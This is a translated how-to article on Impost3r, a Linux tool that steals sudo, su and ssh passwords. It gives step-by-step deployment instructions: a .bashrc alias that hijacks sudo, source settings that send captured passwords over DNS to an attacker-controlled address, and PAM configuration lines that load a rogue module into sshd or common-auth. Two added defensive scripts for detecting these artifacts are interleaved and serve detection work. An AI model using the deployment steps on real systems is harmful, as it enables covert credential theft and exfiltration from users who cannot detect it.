
What tool is Impost3r?

2025-01-19 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report --

This article explains in detail what kind of tool Impost3r is. The editor found it quite practical and is sharing it for reference; I hope you gain something from reading it.

Impost3r is a password-stealing tool for the Linux platform. It is written in C and helps researchers capture various passwords (ssh, su, sudo) from target Linux hosts during a penetration test.

This tool is intended for security research and teaching only; please do not use it for malicious purposes.

Features

1. Automatically erases the traces of the password theft;

2. Transmits the results over the DNS protocol;

3. Requires no user interaction, so the user cannot detect it.

Tool download

Researchers can clone the project source code locally with the following command:

git clone https://github.com/ph5ntonn/Impost3r.git

Tool usage

Impost3r can steal the passwords used by the sudo, su and ssh services. Its modes fall roughly into two categories: sudo, and ssh/su.

Stealing sudo passwords

This mode only requires normal user permissions, not root, but it can only steal the password of that user, not of other users.

First assume that the attacker controls a server with normal user privileges. Make a copy of the user's .bashrc (cp ~/.bashrc /tmp/) and place the copy in a path of the attacker's choosing (here the /tmp/ directory, which the attacker can change). Then edit the .bashrc in the user's home directory (~/.bashrc) and append the following statement as its last line (the path "/tmp/.impost3r" must match FILENAME below):

alias sudo='impost3r() { if [ -f "/tmp/.impost3r" ]; then /tmp/.impost3r "$@" && unalias sudo; else unalias sudo; sudo "$@"; fi; }; impost3r'

When the addition is complete, save the file and execute:

source ~/.bashrc

The attacker then needs to edit the Impost3r source file sudo/main.c:

/* Custom setting */
#define FILENAME "/tmp/.impost3r"        // Location of Impost3r on the target server
#define BACKUP_BASHRC "/tmp/.bashrc"     // Location of the attacker's backup copy of .bashrc on the target server
#define SAVE_OR_SEND 0                   // Save the results on the target machine or send them to the attacker-controlled machine (send = 0, save = 1, default is send)
/* Send to server */
#define MAX_RESEND 30                    // Maximum number of retries when sending a captured password to the attacker's server
#define RESEND_INTERVAL 5                // Interval between transmission attempts
#define REMOTE_ADDRESS "192.168.0.12"    // Remote address the password is sent back to
#define REMOTE_PORT 53                   // Remote port the password is sent back to
/* Save to local */
#define SAVE_LOCATION "/tmp/.cache"      // Location of the result file, used when SAVE_OR_SEND is set to 1

After modification, save and execute in current directory:

make

The compiled .impost3r file appears in the current directory. Upload it to the /tmp/ directory on the target server (an example path only; it can be changed, as long as it matches the definition in the source code). The attacker then starts the DNS server on their own machine and waits for a legitimate user to run sudo, which yields the password.

Note: when stealing sudo passwords, Impost3r erases its traces automatically after a successful capture; the attacker does not need to clean up manually.
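From the defender's side, the sudo mode described above leaves two things on the host that are easy to check for: a line in a shell startup file that redefines sudo as an alias or function, and hidden files under /tmp (the binary and the .bashrc backup). The following script is an added example, not code from the Impost3r project; the sample rc files and hidden files it creates are constructed for the demonstration, and the real locations it audits (~/.bashrc, ~/.profile, /etc/bash.bashrc, /tmp, and so on) are the usual ones rather than anything the article specifies.

```shell
#!/usr/bin/env bash
# Added defensive example; this is not code from the Impost3r project.
# The sudo mode of Impost3r needs an `alias sudo=...` line appended to the
# victim's ~/.bashrc that wraps sudo in a shell function and runs a hidden
# binary first (the article uses /tmp/.impost3r), plus hidden files in /tmp.
# The functions below look for both. Sample contents are constructed.

# Lines that redefine `sudo` in a shell startup file, as an alias or a function.
SUDO_HIJACK_RE='^[[:space:]]*(alias[[:space:]]+sudo=|sudo[[:space:]]*\(\)|function[[:space:]]+sudo([[:space:]]|$))'

# sudo_hijack_lines FILE: print "lineno:line" for every suspicious line
# (prints nothing for a clean or unreadable file).
sudo_hijack_lines() {
    [ -r "$1" ] || return 0
    grep -nE "$SUDO_HIJACK_RE" "$1" || true
}

# count_sudo_hijacks FILE: number of suspicious lines, as a single integer.
count_sudo_hijacks() {
    sudo_hijack_lines "$1" | grep -c . || true
}

# hidden_tmp_files DIR: regular dotfiles directly under DIR (normally /tmp).
# A legitimate /tmp rarely holds hidden regular files; the /tmp/.impost3r
# binary and the /tmp/.bashrc backup from the article would show up here.
hidden_tmp_files() {
    find "$1" -maxdepth 1 -type f -name '.*' 2>/dev/null | sort
}

# make_samples DIR: write constructed sample data so the checks can run
# offline: one clean rc file, one rc file with an Impost3r-style alias
# appended, and two hidden files imitating the /tmp artifacts.
make_samples() {
    mkdir -p "$1"
    cat > "$1/clean.bashrc" <<'EOF'
# constructed sample: ordinary user rc file
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
EOF
    cat > "$1/tampered.bashrc" <<'EOF'
# constructed sample: the same file with a sudo wrapper appended
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
alias sudo='impost3r() { /tmp/.impost3r "$@"; }; impost3r'
EOF
    : > "$1/.impost3r"
    chmod 700 "$1/.impost3r"
    cp "$1/clean.bashrc" "$1/.bashrc"
}

# audit_host: run both checks against the current user's real rc files and
# /tmp. Prints every hit and returns 1 if anything was found, so it can gate
# a cron job or a configuration-management run.
audit_host() {
    local hits=0 f
    for f in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
             "$HOME/.zshrc" /etc/bash.bashrc /etc/profile; do
        hits=$(( hits + $(count_sudo_hijacks "$f") ))
        sudo_hijack_lines "$f" | sed "s|^|$f:|"
    done
    hidden_tmp_files /tmp
    hits=$(( hits + $(hidden_tmp_files /tmp | grep -c . || true) ))
    [ "$hits" -eq 0 ]
}
```

Source the file and call audit_host on a host you defend; an interactive spot check for the same thing is `type sudo`, which should report the binary path (for example /usr/bin/sudo) rather than an alias or a function. Because the tool restores the original .bashrc after a successful capture, the hidden /tmp files and the modification time of ~/.bashrc are often the only remaining evidence, which is why the script reports both.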

Stealing ssh/su passwords

Stealing ssh/su passwords differs from the sudo method above: it requires root permission, but it can steal any user's password.

Take Ubuntu as an example. First assume that the attacker controls a server and has obtained root privileges through privilege escalation (or because a careless administrator runs a service as root). First edit the Impost3r source file ssh_su/main.c:

/* Custom setting */
#define SSH_OR_BOTH 0                    // Stealing mode: 0 steals ssh passwords only, 1 steals both ssh and su passwords; default is 0 (the difference is explained below)
#define SAVE_OR_SEND 0                   // Save the results on the target machine or send them to the attacker-controlled machine (send = 0, save = 1, default is send)
/* Send to server */
#define MAX_RESEND 30                    // Maximum number of retries when sending a captured password to the attacker's server (only effective when SSH_OR_BOTH is 0)
#define RESEND_INTERVAL 5                // Interval between transmission attempts (only effective when SSH_OR_BOTH is 0)
#define REMOTE_ADDRESS "192.168.0.12"    // Remote address the password is sent back to
#define REMOTE_PORT 53                   // Remote port the password is sent back to
/* Save to local */
#define SAVE_LOCATION "/tmp/.sshsucache" // Location of the result file, used when SAVE_OR_SEND is set to 1

After modification, save and execute in current directory:

make

The compiled impost3r.so appears in the current directory. Upload it to /lib/x86_64-linux-gnu/security on the target machine (the directory name may differ between machines; place it accordingly). Then go to /etc/pam.d, where there are two cases. If the chosen mode steals only ssh passwords, run vi sshd and append the following lines to the end of the file:

auth optional impost3r.so
account optional impost3r.so

Save and exit, restart sshd service:

service sshd restart

If you choose to steal both ssh and su passwords, you need to execute:

vi common-auth

Add the same lines, save and exit, and restart the sshd service in the same way. The attacker launches the DNS server on their own machine and waits for legitimate users to log in to the target machine over ssh or to switch users with su, which yields their passwords.

Note: when stealing ssh/su passwords, Impost3r cannot remove its traces because of the permissions involved; the attacker has to remove them manually.
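Because this mode cannot clean up after itself, the artifacts it leaves in /etc/pam.d and in the PAM module directory are exactly what a defender should audit: every module the PAM stacks reference, any referenced module whose name does not follow the pam_<name>.so convention that every stock Linux-PAM module uses, and any module file in the directory that no package owns. The script below is an added example, not code from the Impost3r project. It takes directories as parameters so it can be run against a copied tree or the constructed sample it writes itself; the use of dpkg -S for package ownership is an assumption about a Debian/Ubuntu host, and the naming check is a heuristic that a renamed module would evade, so it complements rather than replaces package verification (dpkg --verify libpam-modules, or rpm -V pam on RPM systems).

```shell
#!/usr/bin/env bash
# Added defensive example; this is not code from the Impost3r project.
# The ssh/su mode of Impost3r places a foreign module (impost3r.so) in the PAM
# module directory and appends "auth optional impost3r.so" and
# "account optional impost3r.so" to /etc/pam.d/sshd or /etc/pam.d/common-auth.
# The checks below list every module the PAM configuration references, flag
# modules not named pam_*.so, and, where dpkg exists, flag unowned module files.

# pam_modules_referenced PAMDIR: print "file:line: module" for every module
# referenced by a config line of the form "<type> <control> <module> [args]".
# Bracketed controls such as "[success=1 default=ignore]" contain spaces, so
# the module is the first field after the closing bracket, not always field 3.
pam_modules_referenced() {
    find "$1" -maxdepth 1 -type f -exec awk '
        /^[[:space:]]*#/ || NF < 3 { next }
        $1 ~ /^-?(auth|account|password|session)$/ {
            i = 3
            if ($2 ~ /^\[/) {
                while (i <= NF && $(i - 1) !~ /\]$/) i++
            }
            if (i <= NF) {
                m = $i
                sub(/.*\//, "", m)      # keep only the basename of a module path
                printf "%s:%d: %s\n", FILENAME, FNR, m
            }
        }' {} + | sort
}

# nonstandard_pam_modules PAMDIR: referenced modules not named pam_<name>.so.
# Heuristic: every stock Linux-PAM module follows that convention.
nonstandard_pam_modules() {
    pam_modules_referenced "$1" | awk '$NF !~ /^pam_[A-Za-z0-9_]+\.so$/'
}

# unpackaged_pam_modules MODDIR: .so files in the module directory that dpkg
# does not attribute to any installed package. Prints nothing when dpkg is
# absent (assumes a Debian/Ubuntu host; use rpm -qf on RPM systems).
unpackaged_pam_modules() {
    command -v dpkg >/dev/null 2>&1 || return 0
    local f
    for f in "$1"/*.so; do
        [ -e "$f" ] || continue
        dpkg -S "$f" >/dev/null 2>&1 || echo "$f"
    done
}

# make_pam_samples DIR: constructed pam.d tree imitating the article's
# tampered sshd file plus an untouched common-auth, for an offline run.
make_pam_samples() {
    mkdir -p "$1/pam.d"
    cat > "$1/pam.d/sshd" <<'EOF'
# constructed sample: PAM configuration for sshd with two lines appended
@include common-auth
account    required     pam_nologin.so
session    optional     pam_motd.so motd=/run/motd.dynamic
auth optional impost3r.so
account optional impost3r.so
EOF
    cat > "$1/pam.d/common-auth" <<'EOF'
# constructed sample: untouched common-auth
auth    [success=1 default=ignore]      pam_unix.so nullok
auth    requisite                       pam_deny.so
auth    required                        pam_permit.so
EOF
}

# audit_pam: run the checks against a live host. Returns 1 if anything was
# flagged. The module directory default is the Ubuntu path from the article.
audit_pam() {
    local pamdir="${1:-/etc/pam.d}" moddir="${2:-/lib/x86_64-linux-gnu/security}" out
    out=$( { nonstandard_pam_modules "$pamdir"; unpackaged_pam_modules "$moddir"; } )
    [ -z "$out" ] || { printf '%s\n' "$out"; return 1; }
}
```

Source the file and call audit_pam, optionally with the PAM config and module directories as arguments; on the constructed sample, nonstandard_pam_modules reports the two impost3r.so lines in sshd and nothing from common-auth. Pair the file checks with host logs: an unexplained sshd restart in the journal, or a change to /etc/pam.d/common-auth, deserves the same scrutiny as a new module file.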

That concludes "What tool is Impost3r?". I hope the above content is of some help and lets you learn something new; if you found the article useful, please share it so that more people can see it.
